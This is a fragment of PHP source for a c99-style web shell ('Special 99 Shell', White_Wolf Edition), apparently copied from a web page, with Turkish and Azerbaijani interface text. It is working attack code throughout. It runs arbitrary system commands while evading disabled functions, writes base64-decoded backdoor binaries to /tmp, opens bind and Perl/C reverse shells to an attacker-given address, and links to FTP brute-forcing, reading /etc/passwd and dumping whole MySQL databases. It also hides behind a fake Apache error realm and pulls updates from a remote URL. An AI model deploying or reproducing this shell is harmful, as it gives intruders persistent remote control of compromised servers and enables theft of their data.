Dark versionDefault version

&1″,”r”))) {
return 126;
}
while (!feof($p)) {
$line=fgets($p,1000);
$out .= $line;
}
pclose($p);
return $out;
}
}else{
function myshellexec($cmd)
{
global $disablefunc;
$result = “”;
if (!empty($cmd))
{
if (is_callable(“exec”) and !in_array(“exec”,$disablefunc)) {exec($cmd,$result); $result = join(“\n”,$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable(“system”) and !in_array(“system”,$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable(“passthru”) and !in_array(“passthru”,$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,”r”)))
{
$result = “”;
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
}
}
return $result;
}
}
}

function checkproxyhost(){
$host = getenv(“HTTP_HOST”);
$filename = ‘/tmp/.setan/xh’;
if (file_exists($filename)) {
$_POST[‘proxyhostmsg’]=”

Tamamlandi!

$host:6543

Note: If ‘$host’ have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won’t be able to connect to this proxy.

“;
} else {
$_POST[‘proxyhostmsg’]=”

HATA!

“;
}
}

if (!empty($_POST[‘backconnectport’]) && ($_POST[‘use’]==”shbd”))
{
$ip = gethostbyname($_SERVER[“HTTP_HOST”]);
$por = $_POST[‘backconnectport’];
if(is_writable(“.”)){
cfb(“shbd”,$backdoor);
ex(“chmod 777 shbd”);
$cmd = “./shbd $por”;
exec(“$cmd > /dev/null &”);
$scan = myshellexec(“ps aux”);
if(eregi(“./shbd $por”,$scan)){ $data = (“\n

Process found running, backdoor setup successfully.”); }elseif(eregi(“./shbd $por”,$scan)){ $data = (“\n
Process not found running, backdoor not setup successfully.”); }
$_POST[‘backcconnmsg’]=”To connect, use netcat and give it the command ‘nc $ip $por’.$data”;
}else{
cfb(“/tmp/shbd”,$backdoor);
ex(“chmod 777 /tmp/shbd”);
$cmd = “./tmp/shbd $por”;
exec(“$cmd > /dev/null &”);
$scan = myshellexec(“ps aux”);
if(eregi(“./shbd $por”,$scan)){ $data = (“\n

Process found running, backdoor setup successfully.”); }elseif(eregi(“./shbd $por”,$scan)){ $data = (“\n
Process not found running, backdoor not setup successfully.”); }
$_POST[‘backcconnmsg’]=”To connect, use netcat and give it the command ‘nc $ip $por’.$data”;
}
}

if (!empty($_POST[‘backconnectip’]) && !empty($_POST[‘backconnectport’]) && ($_POST[‘use’]==”Perl”))
{
if(is_writable(“.”)){
cf(“back”,$back_connect);
$p2=which(“perl”);
$blah = ex($p2.” back “.$_POST[‘backconnectip’].” “.$_POST[‘backconnectport’].” &”);
$_POST[‘backcconnmsg’]=”“.$_POST[‘backconnectip’].”Numarali ip uzerinden “.$_POST[‘backconnectport’].” portundan baglanti kurulamadi! yeniden deneyiniz!.”;
if (file_exists(“back”)) { unlink(“back”); }
}else{
cf(“/tmp/back”,$back_connect);
$p2=which(“perl”);
$blah = ex($p2.” /tmp/back “.$_POST[‘backconnectip’].” “.$_POST[‘backconnectport’].” &”);
$_POST[‘backcconnmsg’]=”Trying to connect to “.$_POST[‘backconnectip’].” on port “.$_POST[‘backconnectport’].”.”;
if (file_exists(“/tmp/back”)) { unlink(“/tmp/back”); }
}
}

if (!empty($_POST[‘backconnectip’]) && !empty($_POST[‘backconnectport’]) && ($_POST[‘use’]==”C”))
{
if(is_writable(“.”)){
cf(“backc”,$back_connect_c);
ex(“chmod 777 backc”);

$blah = ex(“./backc “.$_POST[‘backconnectip’].” “.$_POST[‘backconnectport’].” &”);
$_POST[‘backcconnmsg’]=”Trying to connect to “.$_POST[‘backconnectip’].” on port “.$_POST[‘backconnectport’].”.”;

if (file_exists(“backc”)) { unlink(“backc”); }
}else{
ex(“chmod 777 /tmp/backc”);
cf(“/tmp/backc”,$back_connect_c);

$blah = ex(“/tmp/backc “.$_POST[‘backconnectip’].” “.$_POST[‘backconnectport’].” &”);
$_POST[‘backcconnmsg’]=”Trying to connect to “.$_POST[‘backconnectip’].” on port “.$_POST[‘backconnectport’].”.”;

if (file_exists(“/tmp/backc”)) { unlink(“/tmp/backc”); } }
}

function cf($fname,$text)
{
$w_file=@fopen($fname,”w”) or err();
if($w_file)
{
@fputs($w_file,@base64_decode($text));
@fclose($w_file);
}
}

function cfb($fname,$text)
{
$w_file=@fopen($fname,”w”) or bberr();
if($w_file)
{
@fputs($w_file,@base64_decode($text));
@fclose($w_file);
}
}

function err()
{
$_POST[‘backcconnmsge’]=”

Hata: Baglanti saglanamiyor!“;
}

function bberr()
{
$_POST[‘backcconnmsge’]=”

Hata: Arkakapi sunucusuna baglanti saglanamiyor!“;
}

function which($pr)
{
$path = ex(“which $pr”);
if(!empty($path)) { return $path; } else { return $pr; }
}
function ex($cfe)
{
$res = ”;
if (!empty($cfe))
{
if(function_exists(‘exec’))
{
@exec($cfe,$res);
$res = join(“\n”,$res);
}
elseif(function_exists(‘shell_exec’))
{
$res = @shell_exec($cfe);
}
elseif(function_exists(‘system’))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists(‘passthru’))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,”r”)))
{
$res = “”;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}

ini_set(“memory_limit”,”300M”);
if (!function_exists(“getmicrotime”)) {function getmicrotime() {list($usec, $sec) = explode(” “, microtime()); return ((float)$usec + (float)$sec);}}
if (!function_exists(“file_get_contents”)) { function file_get_contents($filename){ $handle = fopen($filename, “r”); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == “win”;
define(“starttime”,getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists(“strips”)) {function strips(&$arr,$k=””) {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != “GLOBALS”) {strips($arr[“$k”]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$shver = “Capian Pirates.OrG Special 99 Shell v1.0”;
if (!empty($unset_surl)) {setcookie(“c99sh_surl”); $surl = “”;}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie(“c99sh_surl”,$surl);}
else {$surl = $_REQUEST[“c99sh_surl”];
}
$surl_autofill_include = TRUE;
if ($surl_autofill_include and !$_REQUEST[“c99sh_surl”]) {$include = “&”; foreach (explode(“&”,getenv(“QUERY_STRING”)) as $v) {$v = explode(“=”,$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array(“http://”,”https://”,”ssl://”,”ftp://”,”\\\\”) as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name).”=”.urlencode($value).”&”;}}} if ($_REQUEST[“surl_autofill_include”]) {$includestr .= “surl_autofill_include=1&”;}}
if (empty($surl))
{
$surl = “?”.$includestr;
}
$surl = htmlspecialchars($surl);
$timelimit = 0;
$login = “”;
$pass = “”;
$md5_pass = “”;
$host_allow = array(“*”);
$login_txt = “Apache Error: Restricted File”;
$g3n_onaysiz_giris = “access denied”;
$gzipencode = TRUE;
$filestealth = TRUE;
$donated_html = “”;
$donated_act = array(“”);
$curdir = “./”;

$tmpdir = “”;
$tmpdir_log = “./”;
$log_email = “msn@g3n3t1x.org”;
$dsunucu = “http://q.qenetix.by.ru/3.txt”;
$sort_default = “0a”;
$sort_save = TRUE;
$ftypes = array(
“html”=>array(“html”,”htm”,”shtml”),
“txt”=>array(“txt”,”c”,”.bash_history”,”conf”,”bat”,”sh”,”js”,”bak”,”doc”,”log”,”sfc”,”cfg”,”htaccess”),
“exe”=>array(“sh”,”install”,”bat”,”cmd”),
“ini”=>array(“ini”,”inf”),
“code”=>array(“php”,”phtml”,”php3″,”php4″,”inc”,”tcl”,”h”,”c”,”cpp”,”py”,”cgi”,”pl”),
“img”=>array(“gif”,”png”,”jpeg”,”jfif”,”jpg”,”jpe”,”bmp”,”ico”,”tif”,”tiff”,”avi”,”mpg”,”mpeg”),
“sdb”=>array(“sdb”),
“phpsess”=>array(“sess”),
“download”=>array(“exe”,”com”,”pif”,”src”,”lnk”,”zip”,”rar”,”gz”,”tar”)
);

$exeftypes = array(
getenv(“PHPRC”).” -q %f%” => array(“php”,”php3″,”php4″),
“perl %f%” => array(“pl”,”cgi”)
);
$regxp_highlight = array(
array(basename($_SERVER[“PHP_SELF”]),1,”“,”“),
array(“config.php”,1)
);
$safemode_diskettes = array(“a”);
$hexdump_lines = 8;
$hexdump_rows = 24;
$nixpwdperpage = 100;

$sess_cookie = “c99shvars”;

$quicklaunch = array(
array(”


[AnaSəhifə]“,$surl),
array(“[Axtarış]“,$surl.”act=search&d=%d”),

array(“[Encode]“,$surl.”act=encoder&d=%d”),
array(“[İşləmçi]“,$surl.”act=processes&d=%d”),
array(“[FTP Qirici]“,$surl.”act=ftpquickbrute&d=%d”),
array(“[Sistem Məlumatları]“,$surl.”act=security&d=%d”),
array(“[SQL Baglantisi]“,$surl.”act=sql&d=%d”),
array(“[php Kod işlət]“,$surl.”act=eval&d=%d&eval=//readfile(‘/etc/passwd’);”),
array(“[Arxa Qapı]“,$surl.”act=backc”),
array(“[Shell’i Sil]“,$surl.”act=selfremove”),

array(“[ProxyQur]“,$surl.”act=proxy”),
array(“[Qapi Yarat]“,$surl.”act=shbd”),
);

$highlight_background = “#c0c0c0”;
$highlight_bg = “#FFFFFF”;
$highlight_comment = “#6A6A6A”;
$highlight_default = “#0000BB”;
$highlight_html = “#1300FF”;
$highlight_keyword = “#007700”;
$highlight_string = “#000000”;

@$f = $_REQUEST[“f”];
@extract($_REQUEST[“c99shcook”]);

// \/Burdan sonrasэnэ editlemeyiniz!\/
@set_time_limit(0);
$tmp = array();
foreach($host_allow as $k=>$v) {$tmp[] = str_replace(“\\*”,”.*”,preg_quote($v));}
$s = “!^(“.implode(“|”,$tmp).”)$!i”;
if (!preg_match($s,getenv(“REMOTE_ADDR”)) and !preg_match($s,gethostbyaddr(getenv(“REMOTE_ADDR”)))) {exit(“Giris Yapilamiy0r!”);}
if (!empty($login))
{
if (empty($md5_pass)) {$md5_pass = md5($pass);}
if (($_SERVER[“PHP_AUTH_USER”] != $login) or (md5($_SERVER[“PHP_AUTH_PW”]) != $md5_pass))
{
if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(” |
“,” “,$donated_html));}
header(“WWW-Authenticate: Basic realm=\””.$login_txt.”\””);
header(“HTTP/1.0 401 Unauthorized”);
exit($g3n_onaysiz_giris);
}
}
if ($act != “img”){
$lastdir = realpath(“.”);
chdir($curdir);
if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
$sess_data = unserialize($_COOKIE[“$sess_cookie”]);
if (!is_array($sess_data)) {$sess_data = array();}
if (!is_array($sess_data[“copy”])) {$sess_data[“copy”] = array();}
if (!is_array($sess_data[“cut”])) {$sess_data[“cut”] = array();}

$disablefunc = @ini_get(“disable_functions”);
if (!empty($disablefunc))
{
$disablefunc = str_replace(” “,””,$disablefunc);
$disablefunc = explode(“,”,$disablefunc);
}

if (!function_exists(“c99_buff_prepare”))
{
function c99_buff_prepare()
{
global $sess_data;
global $act;
foreach($sess_data[“copy”] as $k=>$v) {$sess_data[“copy”][$k] = str_replace(“\\”,DIRECTORY_SEPARATOR,realpath($v));}
foreach($sess_data[“cut”] as $k=>$v) {$sess_data[“cut”][$k] = str_replace(“\\”,DIRECTORY_SEPARATOR,realpath($v));}
$sess_data[“copy”] = array_unique($sess_data[“copy”]);
$sess_data[“cut”] = array_unique($sess_data[“cut”]);
sort($sess_data[“copy”]);
sort($sess_data[“cut”]);
if ($act != “copy”) {foreach($sess_data[“cut”] as $k=>$v) {if ($sess_data[“copy”][$k] == $v) {unset($sess_data[“copy”][$k]); }}}
else {foreach($sess_data[“copy”] as $k=>$v) {if ($sess_data[“cut”][$k] == $v) {unset($sess_data[“cut”][$k]);}}}
}
}
c99_buff_prepare();
if (!function_exists(“c99_sess_put”))
{
function c99_sess_put($data)
{
global $sess_cookie;
global $sess_data;
c99_buff_prepare();
$sess_data = $data;
$data = serialize($data);
setcookie($sess_cookie,$data);
}
}
foreach (array(“sort”,”sql_sort”) as $v)
{
if (!empty($_GET[$v])) {$$v = $_GET[$v];}
if (!empty($_POST[$v])) {$$v = $_POST[$v];}
}
if ($sort_save)
{
if (!empty($sort)) {setcookie(“sort”,$sort);}
if (!empty($sql_sort)) {setcookie(“sql_sort”,$sql_sort);}
}
if (!function_exists(“str2mini”))
{
function str2mini($content,$len)
{
if (strlen($content) > $len)
{
$len = ceil($len/2) – 2;
return substr($content, 0,$len).”…”.substr($content,-$len);
}
else {return $content;}
}
}
if (!function_exists(“view_size”))
{
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 .” GB”;}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 .” MB”;}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 .” KB”;}
else {$size = $size . ” B”;}
return $size;
}
}
}
if (!function_exists(“fs_copy_dir”))
{
function fs_copy_dir($d,$t)
{
$d = str_replace(“\\”,DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$h = opendir($d);
while (($o = readdir($h)) !== FALSE)
{
if (($o != “.”) and ($o != “..”))
{
if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
if (!$ret) {return $ret;}
}
}
closedir($h);
return TRUE;
}
}
if (!function_exists(“fs_copy_obj”))
{
function fs_copy_obj($d,$t)
{
$d = str_replace(“\\”,DIRECTORY_SEPARATOR,$d);
$t = str_replace(“\\”,DIRECTORY_SEPARATOR,$t);
if (!is_dir(dirname($t))) {mkdir(dirname($t));}
if (is_dir($d))
{
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
return fs_copy_dir($d,$t);
}
elseif (is_file($d)) {return copy($d,$t);}
else {return FALSE;}
}
}
if (!function_exists(“fs_move_dir”))
{
function fs_move_dir($d,$t)
{
$h = opendir($d);
if (!is_dir($t)) {mkdir($t);}
while (($o = readdir($h)) !== FALSE)
{
if (($o != “.”) and ($o != “..”))
{
$ret = TRUE;
if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
if (!$ret) {return $ret;}
}
}
closedir($h);
return TRUE;
}
}
if (!function_exists(“fs_move_obj”))
{
function fs_move_obj($d,$t)
{
$d = str_replace(“\\”,DIRECTORY_SEPARATOR,$d);
$t = str_replace(“\\”,DIRECTORY_SEPARATOR,$t);
if (is_dir($d))
{
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
return fs_move_dir($d,$t);
}
elseif (is_file($d))
{
if(copy($d,$t)) {return unlink($d);}
else {unlink($t); return FALSE;}
}
else {return FALSE;}
}
}
if (!function_exists(“fs_rmdir”))
{
function fs_rmdir($d)
{
$h = opendir($d);
while (($o = readdir($h)) !== FALSE)
{
if (($o != “.”) and ($o != “..”))
{
if (!is_dir($d.$o)) {unlink($d.$o);}
else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
}
}
closedir($h);
rmdir($d);
return !is_dir($d);
}
}
if (!function_exists(“fs_rmobj”))
{
function fs_rmobj($o)
{
$o = str_replace(“\\”,DIRECTORY_SEPARATOR,$o);
if (is_dir($o))
{
if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
return fs_rmdir($o);
}
elseif (is_file($o)) {return unlink($o);}
else {return FALSE;}
}
}
if (!function_exists(“tabsort”)) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
if (!function_exists(“view_perms”))
{
function view_perms($mode)
{
if (($mode & 0xC000) === 0xC000) {$type = “s”;}
elseif (($mode & 0x4000) === 0x4000) {$type = “d”;}
elseif (($mode & 0xA000) === 0xA000) {$type = “l”;}
elseif (($mode & 0x8000) === 0x8000) {$type = “-“;}
elseif (($mode & 0x6000) === 0x6000) {$type = “b”;}
elseif (($mode & 0x2000) === 0x2000) {$type = “c”;}
elseif (($mode & 0x1000) === 0x1000) {$type = “p”;}
else {$type = “?”;}

$owner[“read”] = ($mode & 00400)?”r”:”-“;
$owner[“write”] = ($mode & 00200)?”w”:”-“;
$owner[“execute”] = ($mode & 00100)?”x”:”-“;
$group[“read”] = ($mode & 00040)?”r”:”-“;
$group[“write”] = ($mode & 00020)?”w”:”-“;
$group[“execute”] = ($mode & 00010)?”x”:”-“;
$world[“read”] = ($mode & 00004)?”r”:”-“;
$world[“write”] = ($mode & 00002)? “w”:”-“;
$world[“execute”] = ($mode & 00001)?”x”:”-“;

if ($mode & 0x800) {$owner[“execute”] = ($owner[“execute”] == “x”)?”s”:”S”;}
if ($mode & 0x400) {$group[“execute”] = ($group[“execute”] == “x”)?”s”:”S”;}
if ($mode & 0x200) {$world[“execute”] = ($world[“execute”] == “x”)?”t”:”T”;}

return $type.join(“”,$owner).join(“”,$group).join(“”,$world);
}
}
if (!function_exists(“posix_getpwuid”) and !in_array(“posix_getpwuid”,$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
if (!function_exists(“posix_getgrgid”) and !in_array(“posix_getgrgid”,$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
if (!function_exists(“posix_kill”) and !in_array(“posix_kill”,$disablefunc)) {function posix_kill($gid) {return FALSE;}}
if (!function_exists(“parse_perms”))
{
function parse_perms($mode)
{
if (($mode & 0xC000) === 0xC000) {$t = “s”;}
elseif (($mode & 0x4000) === 0x4000) {$t = “d”;}
elseif (($mode & 0xA000) === 0xA000) {$t = “l”;}
elseif (($mode & 0x8000) === 0x8000) {$t = “-“;}
elseif (($mode & 0x6000) === 0x6000) {$t = “b”;}
elseif (($mode & 0x2000) === 0x2000) {$t = “c”;}
elseif (($mode & 0x1000) === 0x1000) {$t = “p”;}
else {$t = “?”;}
$o[“r”] = ($mode & 00400) > 0; $o[“w”] = ($mode & 00200) > 0; $o[“x”] = ($mode & 00100) > 0;
$g[“r”] = ($mode & 00040) > 0; $g[“w”] = ($mode & 00020) > 0; $g[“x”] = ($mode & 00010) > 0;
$w[“r”] = ($mode & 00004) > 0; $w[“w”] = ($mode & 00002) > 0; $w[“x”] = ($mode & 00001) > 0;
return array(“t”=>$t,”o”=>$o,”g”=>$g,”w”=>$w);
}
}
if (!function_exists(“parsesort”))
{
function parsesort($sort)
{
$one = intval($sort);
$second = substr($sort,-1);
if ($second != “d”) {$second = “a”;}
return array($one,$second);
}
}
if (!function_exists(“view_perms_color”))
{
function view_perms_color($o)
{
if (!is_readable($o)) {return ““.view_perms(fileperms($o)).”“;}
elseif (!is_writable($o)) {return ““.view_perms(fileperms($o)).”“;}
else {return ““.view_perms(fileperms($o)).”“;}
}
}
if (!function_exists(“mysql_dump”)){
function mysql_dump($set)
{
global $shver;
$sock = $set[“sock”];
$db = $set[“db”];
$print = $set[“print”];
$nl2br = $set[“nl2br”];
$file = $set[“file”];
$add_drop = $set[“add_drop”];
$tabs = $set[“tabs”];
$onlytabs = $set[“onlytabs”];
$ret = array();
$ret[“err”] = array();
if (!is_resource($sock)) {echo(“Error: \$sock is not valid resource.”);}
if (empty($db)) {$db = “db”;}
if (empty($print)) {$print = 0;}
if (empty($nl2br)) {$nl2br = 0;}
if (empty($add_drop)) {$add_drop = TRUE;}
if (empty($file))
{
$file = $tmpdir.”dump_”.getenv(“SERVER_NAME”).”_”.$db.”_”.date(“d-m-Y-H-i-s”).”.sql”;
}
if (!is_array($tabs)) {$tabs = array();}
if (empty($add_drop)) {$add_drop = TRUE;}
if (sizeof($tabs) == 0)
{
// retrive tables-list
$res = mysql_query(“SHOW TABLES FROM “.$db, $sock);
if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
}
$out = “# Dumped by “.$shver.”
# Home page: http://www.g3n3t1x.org
#
# Host Ayarlari:
# MySQL Versiyon: (“.mysql_get_server_info().”) running on “.getenv(“SERVER_ADDR”).” (“.getenv(“SERVER_NAME”).”)”.”
# Tarih: “.date(“d.m.Y H:i:s”).”
# Veritabani: \””.$db.”\”
#———————————————————
“;
$c = count($onlytabs);
foreach($tabs as $tab)
{
if ((in_array($tab,$onlytabs)) or (!$c))
{
if ($add_drop) {$out .= “DROP TABLE IF EXISTS `”.$tab.”`;\n”;}

$res = mysql_query(“SHOW CREATE TABLE `”.$tab.”`”, $sock);
if (!$res) {$ret[“err”][] = mysql_smarterror();}
else
{
$row = mysql_fetch_row($res);
$out .= $row[“1″].”;\n\n”;

$res = mysql_query(“SELECT * FROM `$tab`”, $sock);
if (mysql_num_rows($res) > 0)
{
while ($row = mysql_fetch_assoc($res))
{
$keys = implode(“`, `”, array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
$values = implode(“‘, ‘”, $values);
$sql = “INSERT INTO `$tab`(`”.$keys.”`) VALUES (‘”.$values.”‘);\n”;
$out .= $sql;
}
}
}
}
}
$out .= “#———————————————————————————\n\n”;
if ($file)
{
$fp = fopen($file, “w”);
if (!$fp) {$ret[“err”][] = 2;}
else
{
fwrite ($fp, $out);
fclose ($fp);
}
}
if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
return $out;
}
}
if (!function_exists(“mysql_buildwhere”))
{
function mysql_buildwhere($array,$sep=” and”,$functs=array())
{
if (!is_array($array)) {$array = array();}
$result = “”;
foreach($array as $k=>$v)
{
$value = “”;
if (!empty($functs[$k])) {$value .= $functs[$k].”(“;}
$value .= “‘”.addslashes($v).”‘”;
if (!empty($functs[$k])) {$value .= “)”;}
$result .= “`”.$k.”` = “.$value.$sep;
}
$result = substr($result,0,strlen($result)-strlen($sep));
return $result;
}
}
if (!function_exists(“mysql_fetch_all”))
{
function mysql_fetch_all($query,$sock)
{
if ($sock) {$result = mysql_query($query,$sock);}
else {$result = mysql_query($query);}
$array = array();
while ($row = mysql_fetch_array($result)) {$array[] = $row;}
mysql_free_result($result);
return $array;
}
}
if (!function_exists(“mysql_smarterror”))
{
function mysql_smarterror($type,$sock)
{
if ($sock) {$error = mysql_error($sock);}
else {$error = mysql_error();}
$error = htmlspecialchars($error);
return $error;
}
}
if (!function_exists(“mysql_query_form”))
{
function mysql_query_form()
{
global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = “Query was empty”;} echo “Error:
“.$sql_query_error.”
“;}
if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
if ((!$submit) or ($sql_act))
{
echo “”;
if ($tbl_struct)
{
echo ”

“; if (($sql_query) and (!$submit)) {echo “Do you really want to”;} else {echo “SQL-Query”;} echo “:

 

Fields:
“;
foreach ($tbl_struct as $field) {$name = $field[“Field”]; echo “» “.$name.”
“;}
echo “

“;
}
}
if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
}
}
if (!function_exists(“mysql_create_db”))
{
function mysql_create_db($db,$sock=””)
{
$sql = “CREATE DATABASE `”.addslashes($db).”`;”;
if ($sock) {return mysql_query($sql,$sock);}
else {return mysql_query($sql);}
}
}
if (!function_exists(“mysql_query_parse”))
{
function mysql_query_parse($query)
{
$query = trim($query);
$arr = explode (” “,$query);
/*array array()
{
“METHOD”=>array(output_type),
“METHOD1″…

}
if output_type == 0, no output,
if output_type == 1, no output if no error
if output_type == 2, output without control-buttons
if output_type == 3, output with control-buttons
*/
$types = array(
“SELECT”=>array(3,1),
“SHOW”=>array(2,1),
“DELETE”=>array(1),
“DROP”=>array(1)
);
$result = array();
$op = strtoupper($arr[0]);
if (is_array($types[$op]))
{
$result[“propertions”] = $types[$op];
$result[“query”] = $query;
if ($types[$op] == 2)
{
foreach($arr as $k=>$v)
{
if (strtoupper($v) == “LIMIT”)
{
$result[“limit”] = $arr[$k+1];
$result[“limit”] = explode(“,”,$result[“limit”]);
if (count($result[“limit”]) == 1) {$result[“limit”] = array(0,$result[“limit”][0]);}
unset($arr[$k],$arr[$k+1]);
}
}
}
}
else {return FALSE;}
}
}
if (!function_exists(“c99fsearch”))
{
function c99fsearch($d)
{
global $found;
global $found_d;
global $found_f;
global $search_i_f;
global $search_i_d;
global $a;
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$h = opendir($d);
while (($f = readdir($h)) !== FALSE)
{
if($f != “.” && $f != “..”)
{
$bool = (empty($a[“name_regexp”]) and strpos($f,$a[“name”]) !== FALSE) || ($a[“name_regexp”] and ereg($a[“name”],$f));
if (is_dir($d.$f))
{
$search_i_d++;
if (empty($a[“text”]) and $bool) {$found[] = $d.$f; $found_d++;}
if (!is_link($d.$f)) {c99fsearch($d.$f);}
}
else
{
$search_i_f++;
if ($bool)
{
if (!empty($a[“text”]))
{
$r = @file_get_contents($d.$f);
if ($a[“text_wwo”]) {$a[“text”] = ” “.trim($a[“text”]).” “;}
if (!$a[“text_cs”]) {$a[“text”] = strtolower($a[“text”]); $r = strtolower($r);}
if ($a[“text_regexp”]) {$bool = ereg($a[“text”],$r);}
else {$bool = strpos(” “.$r,$a[“text”],1);}
if ($a[“text_not”]) {$bool = !$bool;}
if ($bool) {$found[] = $d.$f; $found_f++;}
}
else {$found[] = $d.$f; $found_f++;}
}
}
}
}
closedir($h);
}
}
if ($act == “gofile”) {if (is_dir($f)) {$act = “ls”; $d = $f;} else {$act = “f”; $d = dirname($f); $f = basename($f);}}
//Sending headers
@ob_start();
@ob_implicit_flush(0);
function onphpshutdown()
{
global $gzipencode,$ft;
if (!headers_sent() and $gzipencode and !in_array($ft,array(“img”,”download”,”notepad”)))
{
$v = @ob_get_contents();
@ob_end_clean();
@ob_start(“ob_gzHandler”);
echo $v;
@ob_end_flush();
}
}
function c99shexit()
{
onphpshutdown();
exit;
}
header(“Expires: Mon, 26 Jul 1997 05:00:00 GMT”);
header(“Last-Modified: “.gmdate(“D, d M Y H:i:s”).” GMT”);
header(“Cache-Control: no-store, no-cache, must-revalidate”);
header(“Cache-Control: post-check=0, pre-check=0”, FALSE);
header(“Pragma: no-cache”);
if (empty($tmpdir))
{
$tmpdir = ini_get(“upload_tmp_dir”);
if (is_dir($tmpdir)) {$tmpdir = “/tmp/”;}
}
$tmpdir = realpath($tmpdir);
$tmpdir = str_replace(“\\”,DIRECTORY_SEPARATOR,$tmpdir);
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
else {$tmpdir_logs = realpath($tmpdir_logs);}
if (@ini_get(“safe_mode”) or strtolower(@ini_get(“safe_mode”)) == “on”)
{
$safemode = TRUE;
$hsafemode = “İşləyir“;
}
else {$safemode = FALSE; $hsafemode = “İşləmir“;}
$v = @ini_get(“open_basedir”);
if ($v or strtolower($v) == “on”) {$openbasedir = TRUE; $hopenbasedir = ““.$v.”“;}
else {$openbasedir = FALSE; $hopenbasedir = “İşləmir“;}
$sort = htmlspecialchars($sort);
if (empty($sort)) {$sort = $sort_default;}
$sort[1] = strtolower($sort[1]);
$DISP_SERVER_SOFTWARE = getenv(“SERVER_SOFTWARE”);
if (!ereg(“PHP/”.phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= “. PHP/”.phpversion();}
$DISP_SERVER_SOFTWARE = str_replace(“PHP/”.phpversion(),”PHP/”.phpversion().”“,htmlspecialchars($DISP_SERVER_SOFTWARE));
@ini_set(“highlight.bg”,$highlight_bg);
@ini_set(“highlight.comment”,$highlight_comment);
@ini_set(“highlight.default”,$highlight_default);
@ini_set(“highlight.html”,$highlight_html);
@ini_set(“highlight.keyword”,$highlight_keyword);
@ini_set(“highlight.string”,$highlight_string);
if (!is_array($actbox)) {$actbox = array();}
$dspact = $act = htmlspecialchars($act);
$disp_fullpath = $ls_arr = $notls = null;
$ud = urlencode($d);
?>

<br /> Special 99 Shell v1.25 // White_Wolf Edition

   Developing by ฬђเtє_ฬ๏lŦ


Sistem
                  :  


Sistem Melumatlari     : “,1); ?>
 

B.Fonksiy0nlar     :“;
if(”==($df=@ini_get(‘disable_functions’))){echo “ yox
“;}else{echo “$df“;} ?>


